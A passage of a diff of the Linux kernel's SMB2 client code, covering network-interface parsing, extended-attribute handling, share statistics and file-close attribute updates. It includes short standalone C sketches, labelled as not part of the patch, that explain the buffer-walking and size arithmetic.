+-		p = (struct network_interface_info_ioctl_rsp *)((u8 *)p+next);
+-		bytes_left -= next;
+-	}
+-
+-	if (!nb_iface) {
+-		cifs_dbg(VFS, "%s: malformed interface info\n", __func__);
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	/* Azure rounds the buffer size up by 8, to a 16-byte boundary */
+-	if ((bytes_left > 8) || p->Next)
+-		cifs_dbg(VFS, "%s: incomplete interface info\n", __func__);
+-
+-
+-	if (!ses->iface_count) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-out:
+-	return rc;
+-}
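/*
 * Illustrative sketch (not part of the patch): the interface list parsed
 * above is a chain of variable-length records in one buffer, where each
 * record's Next field is the byte offset to its successor and 0 ends the
 * chain. This standalone walker shows the traversal pattern, including
 * the bytes_left check that guards against a truncated or malformed
 * buffer. The three-record layout is made up for the demonstration.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct record {
	uint32_t next;  /* offset to the next record, 0 == last */
	uint32_t value; /* record payload */
};

int main(void)
{
	uint8_t buf[64];
	struct record r[3] = {
		{ .next = 24, .value = 1 }, /* records are padded on the wire */
		{ .next = 16, .value = 2 },
		{ .next = 0,  .value = 3 },
	};
	long bytes_left = 48; /* total valid bytes in buf */
	const uint8_t *p = buf;

	memcpy(buf +  0, &r[0], sizeof(r[0]));
	memcpy(buf + 24, &r[1], sizeof(r[1]));
	memcpy(buf + 40, &r[2], sizeof(r[2]));

	while (bytes_left >= (long)sizeof(struct record)) {
		struct record cur;

		memcpy(&cur, p, sizeof(cur));
		printf("record value %u\n", cur.value);
		if (!cur.next)
			break; /* end of chain */
		if (bytes_left < (long)cur.next)
			break; /* malformed: next points past the buffer */
		p += cur.next;
		bytes_left -= cur.next;
	}
	return 0;
}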
+-
+-int
+-SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_mount)
+-{
+-	int rc;
+-	unsigned int ret_data_len = 0;
+-	struct network_interface_info_ioctl_rsp *out_buf = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-
+-	/* do not query too frequently */
+-	if (ses->iface_last_update &&
+-	    time_before(jiffies, ses->iface_last_update +
+-			(SMB_INTERFACE_POLL_INTERVAL * HZ)))
+-		return 0;
+-
+-	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+-			FSCTL_QUERY_NETWORK_INTERFACE_INFO,
+-			NULL /* no data input */, 0 /* no data input */,
+-			CIFSMaxBufSize, (char **)&out_buf, &ret_data_len);
+-	if (rc == -EOPNOTSUPP) {
+-		cifs_dbg(FYI,
+-			 "server does not support query network interfaces\n");
+-		ret_data_len = 0;
+-	} else if (rc != 0) {
+-		cifs_tcon_dbg(VFS, "error %d on ioctl to get interface list\n", rc);
+-		goto out;
+-	}
+-
+-	rc = parse_server_interfaces(out_buf, ret_data_len, ses, in_mount);
+-	if (rc)
+-		goto out;
+-
+-out:
+-	kfree(out_buf);
+-	return rc;
+-}
+-
+-static void
+-smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+-	      struct cifs_sb_info *cifs_sb)
+-{
+-	int rc;
+-	__le16 srch_path = 0; /* Null - open root of share */
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	struct cached_fid *cfid = NULL;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = "",
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = open_cached_dir(xid, tcon, "", cifs_sb, false, &cfid);
+-	if (rc == 0)
+-		memcpy(&fid, &cfid->fid, sizeof(struct cifs_fid));
+-	else
+-		rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+-			       NULL, NULL);
+-	if (rc)
+-		return;
+-
+-	SMB3_request_interfaces(xid, tcon, true /* called during mount */);
+-
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_ATTRIBUTE_INFORMATION);
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_DEVICE_INFORMATION);
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_VOLUME_INFORMATION);
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_SECTOR_SIZE_INFORMATION); /* SMB3 specific */
+-	if (cfid == NULL)
+-		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-	else
+-		close_cached_dir(cfid);
+-}
+-
+-static void
+-smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+-	      struct cifs_sb_info *cifs_sb)
+-{
+-	int rc;
+-	__le16 srch_path = 0; /* Null - open root of share */
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = "",
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+-		       NULL, NULL);
+-	if (rc)
+-		return;
+-
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_ATTRIBUTE_INFORMATION);
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_DEVICE_INFORMATION);
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-}
+-
+-static int
+-smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct cifs_sb_info *cifs_sb, const char *full_path)
+-{
+-	__le16 *utf16_path;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	int err_buftype = CIFS_NO_BUFFER;
+-	struct cifs_open_parms oparms;
+-	struct kvec err_iov = {};
+-	struct cifs_fid fid;
+-	struct cached_fid *cfid;
+-	bool islink;
+-	int rc, rc2;
+-
+-	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, true, &cfid);
+-	if (!rc) {
+-		if (cfid->has_lease) {
+-			close_cached_dir(cfid);
+-			return 0;
+-		}
+-		close_cached_dir(cfid);
+-	}
+-
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = full_path,
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+-		       &err_iov, &err_buftype);
+-	if (rc) {
+-		struct smb2_hdr *hdr = err_iov.iov_base;
+-
+-		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
+-			goto out;
+-
+-		if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
+-			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
+-							     full_path, &islink);
+-			if (rc2) {
+-				rc = rc2;
+-				goto out;
+-			}
+-			if (islink)
+-				rc = -EREMOTE;
+-		}
+-		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+-		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+-			rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	rc = SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-
+-out:
+-	free_rsp_buf(err_buftype, err_iov.iov_base);
+-	kfree(utf16_path);
+-	return rc;
+-}
+-
+-static int smb2_get_srv_inum(const unsigned int xid, struct cifs_tcon *tcon,
+-			     struct cifs_sb_info *cifs_sb, const char *full_path,
+-			     u64 *uniqueid, struct cifs_open_info_data *data)
+-{
+-	*uniqueid = le64_to_cpu(data->fi.IndexNumber);
+-	return 0;
+-}
+-
+-static int smb2_query_file_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifsFileInfo *cfile, struct cifs_open_info_data *data)
+-{
+-	struct cifs_fid *fid = &cfile->fid;
+-
+-	if (cfile->symlink_target) {
+-		data->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-		if (!data->symlink_target)
+-			return -ENOMEM;
+-	}
+-	return SMB2_query_info(xid, tcon, fid->persistent_fid, fid->volatile_fid, &data->fi);
+-}
+-
+-#ifdef CONFIG_CIFS_XATTR
+-static ssize_t
+-move_smb2_ea_to_cifs(char *dst, size_t dst_size,
+-		     struct smb2_file_full_ea_info *src, size_t src_size,
+-		     const unsigned char *ea_name)
+-{
+-	int rc = 0;
+-	unsigned int ea_name_len = ea_name ? strlen(ea_name) : 0;
+-	char *name, *value;
+-	size_t buf_size = dst_size;
+-	size_t name_len, value_len, user_name_len;
+-
+-	while (src_size > 0) {
+-		name_len = (size_t)src->ea_name_length;
+-		value_len = (size_t)le16_to_cpu(src->ea_value_length);
+-
+-		if (name_len == 0)
+-			break;
+-
+-		if (src_size < 8 + name_len + 1 + value_len) {
+-			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
+-			rc = -EIO;
+-			goto out;
+-		}
+-
+-		name = &src->ea_data[0];
+-		value = &src->ea_data[src->ea_name_length + 1];
+-
+-		if (ea_name) {
+-			if (ea_name_len == name_len &&
+-			    memcmp(ea_name, name, name_len) == 0) {
+-				rc = value_len;
+-				if (dst_size == 0)
+-					goto out;
+-				if (dst_size < value_len) {
+-					rc = -ERANGE;
+-					goto out;
+-				}
+-				memcpy(dst, value, value_len);
+-				goto out;
+-			}
+-		} else {
+-			/* 'user.' plus a terminating null */
+-			user_name_len = 5 + 1 + name_len;
+-
+-			if (buf_size == 0) {
+-				/* skip copy - calc size only */
+-				rc += user_name_len;
+-			} else if (dst_size >= user_name_len) {
+-				dst_size -= user_name_len;
+-				memcpy(dst, "user.", 5);
+-				dst += 5;
+-				memcpy(dst, src->ea_data, name_len);
+-				dst += name_len;
+-				*dst = 0;
+-				++dst;
+-				rc += user_name_len;
+-			} else {
+-				/* stop before overrun buffer */
+-				rc = -ERANGE;
+-				break;
+-			}
+-		}
+-
+-		if (!src->next_entry_offset)
+-			break;
+-
+-		if (src_size < le32_to_cpu(src->next_entry_offset)) {
+-			/* stop before overrun buffer */
+-			rc = -ERANGE;
+-			break;
+-		}
+-		src_size -= le32_to_cpu(src->next_entry_offset);
+-		src = (void *)((char *)src +
+-			       le32_to_cpu(src->next_entry_offset));
+-	}
+-
+-	/* didn't find the named attribute */
+-	if (ea_name)
+-		rc = -ENODATA;
+-
+-out:
+-	return (ssize_t)rc;
+-}
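/*
 * Illustrative sketch (not part of the patch): when listing EAs, every
 * server-side name is surfaced to userspace as "user.<name>\0", so the
 * space needed per entry is 5 ("user.") + name length + 1 NUL -- the
 * user_name_len computation above. A first pass with no destination
 * buffer returns the total so callers can size their allocation,
 * mirroring listxattr() semantics.
 */
#include <stdio.h>
#include <string.h>

/* returns bytes needed (dst == NULL) or bytes written */
static size_t emit_ea_name(char *dst, const char *name)
{
	size_t need = 5 + strlen(name) + 1;

	if (dst) {
		memcpy(dst, "user.", 5);
		strcpy(dst + 5, name); /* copies the trailing NUL too */
	}
	return need;
}

int main(void)
{
	char out[32];
	size_t need = emit_ea_name(NULL, "comment"); /* sizing pass */

	printf("need %zu bytes\n", need);            /* 13 */
	emit_ea_name(out, "comment");
	printf("entry: %s\n", out);                  /* user.comment */
	return 0;
}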
+-
+-static ssize_t
+-smb2_query_eas(const unsigned int xid, struct cifs_tcon *tcon,
+-	       const unsigned char *path, const unsigned char *ea_name,
+-	       char *ea_data, size_t buf_size,
+-	       struct cifs_sb_info *cifs_sb)
+-{
+-	int rc;
+-	struct kvec rsp_iov = {NULL, 0};
+-	int buftype = CIFS_NO_BUFFER;
+-	struct smb2_query_info_rsp *rsp;
+-	struct smb2_file_full_ea_info *info = NULL;
+-
+-	rc = smb2_query_info_compound(xid, tcon, path,
+-				      FILE_READ_EA,
+-				      FILE_FULL_EA_INFORMATION,
+-				      SMB2_O_INFO_FILE,
+-				      CIFSMaxBufSize -
+-				      MAX_SMB2_CREATE_RESPONSE_SIZE -
+-				      MAX_SMB2_CLOSE_RESPONSE_SIZE,
+-				      &rsp_iov, &buftype, cifs_sb);
+-	if (rc) {
+-		/*
+-		 * If ea_name is NULL (listxattr) and there are no EAs,
+-		 * return 0 as it's not an error. Otherwise, the specified
+-		 * ea_name was not found.
+-		 */
+-		if (!ea_name && rc == -ENODATA)
+-			rc = 0;
+-		goto qeas_exit;
+-	}
+-
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength),
+-			       &rsp_iov,
+-			       sizeof(struct smb2_file_full_ea_info));
+-	if (rc)
+-		goto qeas_exit;
+-
+-	info = (struct smb2_file_full_ea_info *)(
+-			le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
+-	rc = move_smb2_ea_to_cifs(ea_data, buf_size, info,
+-			le32_to_cpu(rsp->OutputBufferLength), ea_name);
+-
+- qeas_exit:
+-	free_rsp_buf(buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-
+-static int
+-smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+-	    const char *path, const char *ea_name, const void *ea_value,
+-	    const __u16 ea_value_len, const struct nls_table *nls_codepage,
+-	    struct cifs_sb_info *cifs_sb)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	__le16 *utf16_path = NULL;
+-	int ea_name_len = strlen(ea_name);
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	int len;
+-	struct smb_rqst rqst[3];
+-	int resp_buftype[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct cifs_open_parms oparms;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_fid fid;
+-	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
+-	unsigned int size[1];
+-	void *data[1];
+-	struct smb2_file_full_ea_info *ea = NULL;
+-	struct kvec close_iov[1];
+-	struct smb2_query_info_rsp *rsp;
+-	int rc, used_len = 0;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	if (ea_name_len > 255)
+-		return -EINVAL;
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	if (ses->server->ops->query_all_EAs) {
+-		if (!ea_value) {
+-			rc = ses->server->ops->query_all_EAs(xid, tcon, path,
+-							     ea_name, NULL, 0,
+-							     cifs_sb);
+-			if (rc == -ENODATA)
+-				goto sea_exit;
+-		} else {
+-			/* If we are adding an attribute we should first check
+-			 * if there will be enough space available to store
+-			 * the new EA. If not we should not add it since we
+-			 * would not be able to even read the EAs back.
+-			 */
+-			rc = smb2_query_info_compound(xid, tcon, path,
+-				      FILE_READ_EA,
+-				      FILE_FULL_EA_INFORMATION,
+-				      SMB2_O_INFO_FILE,
+-				      CIFSMaxBufSize -
+-				      MAX_SMB2_CREATE_RESPONSE_SIZE -
+-				      MAX_SMB2_CLOSE_RESPONSE_SIZE,
+-				      &rsp_iov[1], &resp_buftype[1], cifs_sb);
+-			if (rc == 0) {
+-				rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+-				used_len = le32_to_cpu(rsp->OutputBufferLength);
+-			}
+-			free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-			resp_buftype[1] = CIFS_NO_BUFFER;
+-			memset(&rsp_iov[1], 0, sizeof(rsp_iov[1]));
+-			rc = 0;
+-
+-			/* Use a fudge factor of 256 bytes in case we collide
+-			 * with a different set_EAs command.
+-			 */
+-			if (CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
+-			   MAX_SMB2_CLOSE_RESPONSE_SIZE - 256 <
+-			   used_len + ea_name_len + ea_value_len + 1) {
+-				rc = -ENOSPC;
+-				goto sea_exit;
+-			}
+-		}
+-	}
+-
+-	/* Open */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = FILE_WRITE_EA,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto sea_exit;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-
+-	/* Set Info */
+-	memset(&si_iov, 0, sizeof(si_iov));
+-	rqst[1].rq_iov = si_iov;
+-	rqst[1].rq_nvec = 1;
+-
+-	len = sizeof(*ea) + ea_name_len + ea_value_len + 1;
+-	ea = kzalloc(len, GFP_KERNEL);
+-	if (ea == NULL) {
+-		rc = -ENOMEM;
+-		goto sea_exit;
+-	}
+-
+-	ea->ea_name_length = ea_name_len;
+-	ea->ea_value_length = cpu_to_le16(ea_value_len);
+-	memcpy(ea->ea_data, ea_name, ea_name_len + 1);
+-	memcpy(ea->ea_data + ea_name_len + 1, ea_value, ea_value_len);
+-
+-	size[0] = len;
+-	data[0] = ea;
+-
+-	rc = SMB2_set_info_init(tcon, server,
+-				&rqst[1], COMPOUND_FID,
+-				COMPOUND_FID, current->tgid,
+-				FILE_FULL_EA_INFORMATION,
+-				SMB2_O_INFO_FILE, 0, data, size);
+-	if (rc)
+-		goto sea_exit;
+-	smb2_set_next_command(tcon, &rqst[1]);
+-	smb2_set_related(&rqst[1]);
+-
+-
+-	/* Close */
+-	memset(&close_iov, 0, sizeof(close_iov));
+-	rqst[2].rq_iov = close_iov;
+-	rqst[2].rq_nvec = 1;
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto sea_exit;
+-	smb2_set_related(&rqst[2]);
+-
+-	rc = compound_send_recv(xid, ses, server,
+-				flags, 3, rqst,
+-				resp_buftype, rsp_iov);
+-	/* no need to bump num_remote_opens because handle immediately closed */
+-
+- sea_exit:
+-	kfree(ea);
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_set_info_free(&rqst[1]);
+-	SMB2_close_free(&rqst[2]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	return rc;
+-}
+-#endif
+-
+-static bool
+-smb2_can_echo(struct TCP_Server_Info *server)
+-{
+-	return server->echoes;
+-}
+-
+-static void
+-smb2_clear_stats(struct cifs_tcon *tcon)
+-{
+-	int i;
+-
+-	for (i = 0; i < NUMBER_OF_SMB2_COMMANDS; i++) {
+-		atomic_set(&tcon->stats.smb2_stats.smb2_com_sent[i], 0);
+-		atomic_set(&tcon->stats.smb2_stats.smb2_com_failed[i], 0);
+-	}
+-}
+-
+-static void
+-smb2_dump_share_caps(struct seq_file *m, struct cifs_tcon *tcon)
+-{
+-	seq_puts(m, "\n\tShare Capabilities:");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_DFS)
+-		seq_puts(m, " DFS,");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY)
+-		seq_puts(m, " CONTINUOUS AVAILABILITY,");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_SCALEOUT)
+-		seq_puts(m, " SCALEOUT,");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_CLUSTER)
+-		seq_puts(m, " CLUSTER,");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_ASYMMETRIC)
+-		seq_puts(m, " ASYMMETRIC,");
+-	if (tcon->capabilities == 0)
+-		seq_puts(m, " None");
+-	if (tcon->ss_flags & SSINFO_FLAGS_ALIGNED_DEVICE)
+-		seq_puts(m, " Aligned,");
+-	if (tcon->ss_flags & SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE)
+-		seq_puts(m, " Partition Aligned,");
+-	if (tcon->ss_flags & SSINFO_FLAGS_NO_SEEK_PENALTY)
+-		seq_puts(m, " SSD,");
+-	if (tcon->ss_flags & SSINFO_FLAGS_TRIM_ENABLED)
+-		seq_puts(m, " TRIM-support,");
+-
+-	seq_printf(m, "\tShare Flags: 0x%x", tcon->share_flags);
+-	seq_printf(m, "\n\ttid: 0x%x", tcon->tid);
+-	if (tcon->perf_sector_size)
+-		seq_printf(m, "\tOptimal sector size: 0x%x",
+-			   tcon->perf_sector_size);
+-	seq_printf(m, "\tMaximal Access: 0x%x", tcon->maximal_access);
+-}
+-
+-static void
+-smb2_print_stats(struct seq_file *m, struct cifs_tcon *tcon)
+-{
+-	atomic_t *sent = tcon->stats.smb2_stats.smb2_com_sent;
+-	atomic_t *failed = tcon->stats.smb2_stats.smb2_com_failed;
+-
+-	/*
+-	 *  Can't display SMB2_NEGOTIATE, SESSION_SETUP, LOGOFF, CANCEL and ECHO
+-	 *  totals (requests sent) since those SMBs are per-session not per tcon
+-	 */
+-	seq_printf(m, "\nBytes read: %llu  Bytes written: %llu",
+-		   (long long)(tcon->bytes_read),
+-		   (long long)(tcon->bytes_written));
+-	seq_printf(m, "\nOpen files: %d total (local), %d open on server",
+-		   atomic_read(&tcon->num_local_opens),
+-		   atomic_read(&tcon->num_remote_opens));
+-	seq_printf(m, "\nTreeConnects: %d total %d failed",
+-		   atomic_read(&sent[SMB2_TREE_CONNECT_HE]),
+-		   atomic_read(&failed[SMB2_TREE_CONNECT_HE]));
+-	seq_printf(m, "\nTreeDisconnects: %d total %d failed",
+-		   atomic_read(&sent[SMB2_TREE_DISCONNECT_HE]),
+-		   atomic_read(&failed[SMB2_TREE_DISCONNECT_HE]));
+-	seq_printf(m, "\nCreates: %d total %d failed",
+-		   atomic_read(&sent[SMB2_CREATE_HE]),
+-		   atomic_read(&failed[SMB2_CREATE_HE]));
+-	seq_printf(m, "\nCloses: %d total %d failed",
+-		   atomic_read(&sent[SMB2_CLOSE_HE]),
+-		   atomic_read(&failed[SMB2_CLOSE_HE]));
+-	seq_printf(m, "\nFlushes: %d total %d failed",
+-		   atomic_read(&sent[SMB2_FLUSH_HE]),
+-		   atomic_read(&failed[SMB2_FLUSH_HE]));
+-	seq_printf(m, "\nReads: %d total %d failed",
+-		   atomic_read(&sent[SMB2_READ_HE]),
+-		   atomic_read(&failed[SMB2_READ_HE]));
+-	seq_printf(m, "\nWrites: %d total %d failed",
+-		   atomic_read(&sent[SMB2_WRITE_HE]),
+-		   atomic_read(&failed[SMB2_WRITE_HE]));
+-	seq_printf(m, "\nLocks: %d total %d failed",
+-		   atomic_read(&sent[SMB2_LOCK_HE]),
+-		   atomic_read(&failed[SMB2_LOCK_HE]));
+-	seq_printf(m, "\nIOCTLs: %d total %d failed",
+-		   atomic_read(&sent[SMB2_IOCTL_HE]),
+-		   atomic_read(&failed[SMB2_IOCTL_HE]));
+-	seq_printf(m, "\nQueryDirectories: %d total %d failed",
+-		   atomic_read(&sent[SMB2_QUERY_DIRECTORY_HE]),
+-		   atomic_read(&failed[SMB2_QUERY_DIRECTORY_HE]));
+-	seq_printf(m, "\nChangeNotifies: %d total %d failed",
+-		   atomic_read(&sent[SMB2_CHANGE_NOTIFY_HE]),
+-		   atomic_read(&failed[SMB2_CHANGE_NOTIFY_HE]));
+-	seq_printf(m, "\nQueryInfos: %d total %d failed",
+-		   atomic_read(&sent[SMB2_QUERY_INFO_HE]),
+-		   atomic_read(&failed[SMB2_QUERY_INFO_HE]));
+-	seq_printf(m, "\nSetInfos: %d total %d failed",
+-		   atomic_read(&sent[SMB2_SET_INFO_HE]),
+-		   atomic_read(&failed[SMB2_SET_INFO_HE]));
+-	seq_printf(m, "\nOplockBreaks: %d sent %d failed",
+-		   atomic_read(&sent[SMB2_OPLOCK_BREAK_HE]),
+-		   atomic_read(&failed[SMB2_OPLOCK_BREAK_HE]));
+-}
+-
+-static void
+-smb2_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
+-
+-	cfile->fid.persistent_fid = fid->persistent_fid;
+-	cfile->fid.volatile_fid = fid->volatile_fid;
+-	cfile->fid.access = fid->access;
+-#ifdef CONFIG_CIFS_DEBUG2
+-	cfile->fid.mid = fid->mid;
+-#endif /* CIFS_DEBUG2 */
+-	server->ops->set_oplock_level(cinode, oplock, fid->epoch,
+-				      &fid->purge_cache);
+-	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
+-	memcpy(cfile->fid.create_guid, fid->create_guid, 16);
+-}
+-
+-static void
+-smb2_close_file(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifs_fid *fid)
+-{
+-	SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+-}
+-
+-static void
+-smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile)
+-{
+-	struct smb2_file_network_open_info file_inf;
+-	struct inode *inode;
+-	int rc;
+-
+-	rc = __SMB2_close(xid, tcon, cfile->fid.persistent_fid,
+-		   cfile->fid.volatile_fid, &file_inf);
+-	if (rc)
+-		return;
+-
+-	inode = d_inode(cfile->dentry);
+-
+-	spin_lock(&inode->i_lock);
+-	CIFS_I(inode)->time = jiffies;
+-
+-	/* Creation time should not need to be updated on close */
+-	if (file_inf.LastWriteTime)
+-		inode->i_mtime = cifs_NTtimeToUnix(file_inf.LastWriteTime);
+-	if (file_inf.ChangeTime)
+-		inode->i_ctime = cifs_NTtimeToUnix(file_inf.ChangeTime);
+-	if (file_inf.LastAccessTime)
+-		inode->i_atime = cifs_NTtimeToUnix(file_inf.LastAccessTime);
+-
+-	/*
+-	 * i_blocks is not (i_size / i_blksize); it is
+-	 * counted in 512-byte (2**9) units, which is what
+-	 * the num-blocks calculation requires.
+-	 */
+-	if (le64_to_cpu(file_inf.AllocationSize) > 4096)
+-		inode->i_blocks =
+-			(512 - 1 + le64_to_cpu(file_inf.AllocationSize)) >> 9;
+-
+-	/* End of file and Attributes should not have to be updated on close */
+-	spin_unlock(&inode->i_lock);
+-}
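/*
 * Illustrative sketch (not part of the patch): since i_blocks is counted
 * in 512-byte units regardless of the filesystem block size, the close
 * path above converts the server's AllocationSize with a round-up shift
 * rather than dividing by i_blksize.
 */
#include <stdint.h>
#include <stdio.h>

static uint64_t alloc_to_blocks(uint64_t allocation_size)
{
	return (allocation_size + 512 - 1) >> 9; /* round up to 512B units */
}

int main(void)
{
	printf("%llu\n", (unsigned long long)alloc_to_blocks(4097));  /* 9 */
	printf("%llu\n", (unsigned long long)alloc_to_blocks(65536)); /* 128 */
	return 0;
}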
+-
+-static int
+-SMB2_request_res_key(const unsigned int xid, struct cifs_tcon *tcon,
+-		     u64 persistent_fid, u64 volatile_fid,
+-		     struct copychunk_ioctl *pcchunk)
+-{
+-	int rc;
+-	unsigned int ret_data_len;
+-	struct resume_key_req *res_key;
+-
+-	rc = SMB2_ioctl(xid, tcon, persistent_fid, volatile_fid,
+-			FSCTL_SRV_REQUEST_RESUME_KEY, NULL, 0 /* no input */,
+-			CIFSMaxBufSize, (char **)&res_key, &ret_data_len);
+-
+-	if (rc == -EOPNOTSUPP) {
+-		pr_warn_once("Server share %s does not support copy range\n", tcon->tree_name);
+-		goto req_res_key_exit;
+-	} else if (rc) {
+-		cifs_tcon_dbg(VFS, "refcpy ioctl error %d getting resume key\n", rc);
+-		goto req_res_key_exit;
+-	}
+-	if (ret_data_len < sizeof(struct resume_key_req)) {
+-		cifs_tcon_dbg(VFS, "Invalid refcopy resume key length\n");
+-		rc = -EINVAL;
+-		goto req_res_key_exit;
+-	}
+-	memcpy(pcchunk->SourceKey, res_key->ResumeKey, COPY_CHUNK_RES_KEY_SIZE);
+-
+-req_res_key_exit:
+-	kfree(res_key);
+-	return rc;
+-}
+-
+-struct iqi_vars {
+-	struct smb_rqst rqst[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qi_iov[1];
+-	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
+-	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
+-	struct kvec close_iov[1];
+-};
+-
+-static int
+-smb2_ioctl_query_info(const unsigned int xid,
+-		      struct cifs_tcon *tcon,
+-		      struct cifs_sb_info *cifs_sb,
+-		      __le16 *path, int is_dir,
+-		      unsigned long p)
+-{
+-	struct iqi_vars *vars;
+-	struct smb_rqst *rqst;
+-	struct kvec *rsp_iov;
+-	struct cifs_ses *ses = tcon->ses;
